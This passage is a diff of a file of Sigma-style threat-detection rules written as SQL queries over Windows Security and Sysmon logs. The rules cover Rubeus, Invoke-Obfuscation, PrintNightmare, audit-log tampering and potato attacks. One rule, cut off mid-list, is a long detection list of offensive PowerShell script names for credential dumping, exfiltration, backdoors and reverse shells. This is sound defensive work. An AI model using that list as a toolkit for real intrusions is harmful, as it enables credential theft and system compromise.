"title": "Suspicious Scheduled Task Write to System32 Tasks", - "id": "80e1f67a-4596-4351-98f5-a9c3efabac95", + "title": "Register new Logon Process by Rubeus", + "id": "12e6d621-194f-4f59-90cc-1959e21e69f7", "status": "test", - "description": "Detects the creation of tasks from processes executed from suspicious locations", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential use of Rubeus via registered new trusted logon process", + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", "tags": [ - "attack.persistence", - "attack.execution", - "attack.t1053" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Windows\\\\System32\\\\Tasks%' ESCAPE '\\' AND (Image LIKE 
'%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\config\\\\systemprofile%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4611' AND LogonProcessName = 'User32LogonProcesss')" ], - "filename": "file_event_win_susp_task_write.yml" + "filename": "win_security_register_new_logon_process_by_rubeus.yml" }, { - "title": "Inveigh Execution Artefacts", - "id": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", + "title": "Invoke-Obfuscation Via Use Rundll32 - Security", + "id": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", "status": "experimental", - "description": "Detects the presence and execution of Inveigh via dropped artefacts", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\Inveigh-Log.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Cleartext.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-FormInput.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Relay.ps1' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND 
ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ServiceFileName LIKE '%value%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%comspec%' ESCAPE '\\' OR ServiceFileName LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "file_event_win_hktl_inveigh_artefacts.yml" + "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" }, { - "title": "Suspicious Double Extension Files", - "id": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", + "title": "Remote WMI ActiveScriptEventConsumers", + "id": "9599c180-e3a8-4743-8f92-7fb96d3be648", + "status": "test", + "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.003" + ], + "falsepositives": [ + "SCCM" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4624' AND LogonType = '3' AND ProcessName LIKE '%scrcons.exe' ESCAPE '\\') AND NOT (TargetLogonId = '0x3e7'))" + ], + "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml" + }, + { + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - Security", + "id": "fd0f5778-d3cb-4c9a-9695-66759d04702a", "status": "experimental", - "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "author": 
"Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1036.007" + "attack.t1027" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) OR (TargetFilename LIKE '%.zip.exe' ESCAPE '\\' OR TargetFilename LIKE '%.rar.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ServiceFileName REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ServiceFileName REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ServiceFileName REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ServiceFileName REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ServiceFileName REGEXP '\\$VerbosePreference\\.ToString\\(' OR ServiceFileName REGEXP '\\String\\]\\s*\\$VerbosePreference'))" ], - "filename": "file_event_win_susp_double_extension.yml" + "filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" }, { - "title": "Suspicious Creation TXT File in User Desktop", - "id": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", - "status": "test", - "description": "Ransomware create txt file in the user Desktop", - "author": "frack113", + "title": "Password Change on Directory Service Restore Mode (DSRM) Account", + "id": 
"53ad8e36-f573-46bf-97e4-15ba5bf4bb51", + "status": "stable", + "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.", + "author": "Thomas Patzke", "tags": [ - "attack.impact", - "attack.t1486" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Unknown" + "Initial installation of a domain controller" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.txt' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4794')" ], - "filename": "file_event_win_susp_desktop_txt.yml" + "filename": "win_security_susp_dsrm_password_change.yml" }, { - "title": "CVE-2022-24527 Microsoft Connected Cache LPE", - "id": "e0a41412-c69a-446f-8e6e-0e6d7483dad7", - "status": "experimental", - "description": "Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache", - "author": "Florian Roth (Nextron Systems)", + "title": "First Time Seen Remote Named Pipe", + "id": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", + "status": "test", + "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", + "author": "Samir Bousseaden", "tags": [ - "attack.privilege_escalation", - "attack.t1059.001", - "cve.2022.24527" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Unknown" + "Update the excluded named pipe to filter out any newly observed legit named pipe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND 
TargetFilename LIKE '%WindowsPowerShell\\\\Modules\\\\webAdministration\\\\webAdministration.psm1' ESCAPE '\\' AND NOT ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\') AND NOT ((RelativeTargetName LIKE 'atsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'samr' ESCAPE '\\' OR RelativeTargetName LIKE 'lsarpc' ESCAPE '\\' OR RelativeTargetName LIKE 'lsass' ESCAPE '\\' OR RelativeTargetName LIKE 'winreg' ESCAPE '\\' OR RelativeTargetName LIKE 'netlogon' ESCAPE '\\' OR RelativeTargetName LIKE 'srvsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\' OR RelativeTargetName LIKE 'wkssvc' ESCAPE '\\' OR RelativeTargetName LIKE 'browser' ESCAPE '\\' OR RelativeTargetName LIKE 'netdfs' ESCAPE '\\' OR RelativeTargetName LIKE 'svcctl' ESCAPE '\\' OR RelativeTargetName LIKE 'spoolss' ESCAPE '\\' OR RelativeTargetName LIKE 'ntsvcs' ESCAPE '\\' OR RelativeTargetName LIKE 'LSM\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'HydraLsPipe' ESCAPE '\\' OR RelativeTargetName LIKE 'TermSrv\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'MsFteWds' ESCAPE '\\' OR RelativeTargetName LIKE 'sql\\\\query' ESCAPE '\\' OR RelativeTargetName LIKE 'eventlog' ESCAPE '\\')))" ], - "filename": "file_event_win_cve_2022_24527_lpe.yml" + "filename": "win_security_lm_namedpipe.yml" }, { - "title": "Creation Exe for Service with Unquoted Path", - "id": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", + "title": "Suspicious LDAP-Attributes Used", + "id": "d00a9a72-2c09-4459-ad03-5e0a23351e36", "status": "test", - "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to 
launch.\n", - "author": "frack113", + "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", + "author": "xknow @xknow_infosec", "tags": [ - "attack.persistence", - "attack.t1547.009" + "attack.t1001.003", + "attack.command_and_control" ], "falsepositives": [ - "Unknown" + "Companies, who may use these default LDAP-Attributes for personal information" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\program.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeValue LIKE '%' ESCAPE '\\' AND AttributeLDAPDisplayName IN ('primaryInternationalISDNNumber', 'otherFacsimileTelephoneNumber', 'primaryTelexNumber'))" ], - "filename": "file_event_win_creation_unquoted_service_path.yml" + "filename": "win_security_susp_ldap_dataexchange.yml" }, { - "title": "Adwind RAT / JRAT File Artifact", - "id": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", + "title": "Hacktool Ruler", + "id": "24549159-ac1b-479c-8175-d42aea947cae", "status": "test", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "description": "This events that are generated when using the hacktool Ruler by Sensepost", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.discovery", "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.t1087", + "attack.t1114", + "attack.t1059", + "attack.t1550.002" + ], + "falsepositives": [ + "Go utilities that use staaldraad awesome NTLM library" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 
'%\\\\AppData\\\\Roaming\\\\Oracle\\\\bin\\\\java%' ESCAPE '\\' AND TargetFilename LIKE '%.exe%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Retrive%' ESCAPE '\\' AND TargetFilename LIKE '%.vbs%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4776' AND Workstation = 'RULER') OR (EventID IN ('4624', '4625') AND WorkstationName = 'RULER')))" ], - "filename": "file_event_win_mal_adwind.yml" + "filename": "win_security_alert_ruler.yml" }, { - "title": "QuarksPwDump Dump File", - "id": "847def9e-924d-4e90-b7c4-5f581395a2b4", - "status": "test", - "description": "Detects a dump file written by QuarksPwDump password dumper", - "author": "Florian Roth (Nextron Systems)", + "title": "CVE-2021-1675 Print Spooler Exploitation IPC Access", + "id": "8fe1c584-ee61-444b-be21-e9054b229694", + "status": "experimental", + "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527", + "author": "INIT_6", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.execution", + "attack.t1569", + "cve.2021.1675", + "cve.2021.34527" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM-%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss' AND AccessMask = '0x3' AND ObjectType = 'File')" ], - "filename": "file_event_win_hktl_quarkspw_filedump.yml" + "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml" }, { - "title": "APT29 2018 Phishing Campaign File Indicators", - "id": "3a3f81ca-652c-482b-adeb-b1c804727f74", - "status": "stable", - 
"description": "Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant", - "author": "@41thexplorer", + "title": "Disabling Windows Event Auditing", + "id": "69aeb277-f15f-4d2d-b32a-55e883609563", + "status": "test", + "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.\n", + "author": "@neu5ron", "tags": [ - "attack.execution", - "attack.t1218.011" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%ds7002.lnk%' ESCAPE '\\' OR TargetFilename LIKE '%ds7002.pdf%' ESCAPE '\\' OR TargetFilename LIKE '%ds7002.zip%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4719' AND (AuditPolicyChanges LIKE '%\\%\\%8448%' ESCAPE '\\' OR AuditPolicyChanges LIKE '%\\%\\%8450%' ESCAPE '\\'))" ], - "filename": "file_event_win_apt_cozy_bear_phishing_campaign_indicators.yml" + "filename": "win_security_disable_event_logging.yml" }, { - "title": "Malicious PowerShell Scripts - FileCreation", - "id": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", + "title": "RottenPotato Like Attack Pattern", + "id": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", "status": "test", - 
"description": "Detects the creation of known offensive powershell scripts used for exploitation", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein", + "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", + "author": "@SBousseaden, Florian Roth", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1557.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Add-ConstrainedDelegationBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RemoteRegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-ScrnSaveBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Check-VM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ConvertTo-ROT13.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Copy-VSS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Create-MultipleSessions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DNS\\_TXT\\_Pwnage.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Do-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DomainPasswordSpray.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download\\_Execute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download-Execute-PS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enabled-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enable-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-Command-MSSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-DNSTXT-Code.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-OnTime.ps1' ESCAPE '\\' OR 
TargetFilename LIKE '%\\\\ExetoText.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Exploit-Jboss.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-AVSignature.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-Fruit.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-GPOLocation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-TrustedDocuments.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireBuster.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireListener.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ApplicationHost.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ChromeDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ClipboardContents.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ComputerDetail.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-FoxDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPAutologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-IndexedItem.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Keystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-LSASecret.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-MicrophoneAudio.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHashes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHints.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAlwaysInstallElevated.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAutoLogon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RickAstley.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Screenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SecurityPackages.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceFilePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServicePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceUnquoted.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SiteListPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-System.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Get-TimedScreenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-UnattendedInstallFile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Unconstrained.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-USBKeystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VaultCredential.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnAutoRun.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnSchTask.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebConfig.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebCredentials.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WLAN-Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Gupt-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Login.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-ServiceBinary.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-SSP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ACLScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ADSBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-AmsiBypass.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ARPScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BackdoorLNK.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BadPotato.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BetterSafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BruteForce.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Carbuncle.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Certify.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ConPtyShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialsPhish.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DAFT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DCSync.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Decode.ps1' 
ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DinvokeKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DllInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DowngradeAccount.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EgressCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Encode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EventViewer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Eyewitness.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-FakeLogonScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Farmer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Get-RBCD-Threaded.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Gopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper2.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper3.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-HandleKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Interceptor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Internalmonologue.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-InveighRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRegsvr.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRundll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelayUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-LdapSignCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Lockless.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MalSCCM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MimikatzWDigestDowngrade.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikittenz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MITM6.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NanoDump.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Invoke-NetRipper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetworkRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NinjaCopy.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-OxidResolver.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshellx86.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Paranoia.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PortScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttps.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PostExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellIcmp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTCP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLineBind.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerThIEf.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PPLDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Prasadhak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcatAgent.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PSInject.ps1' ESCAPE '\\' OR TargetFilename LIKE 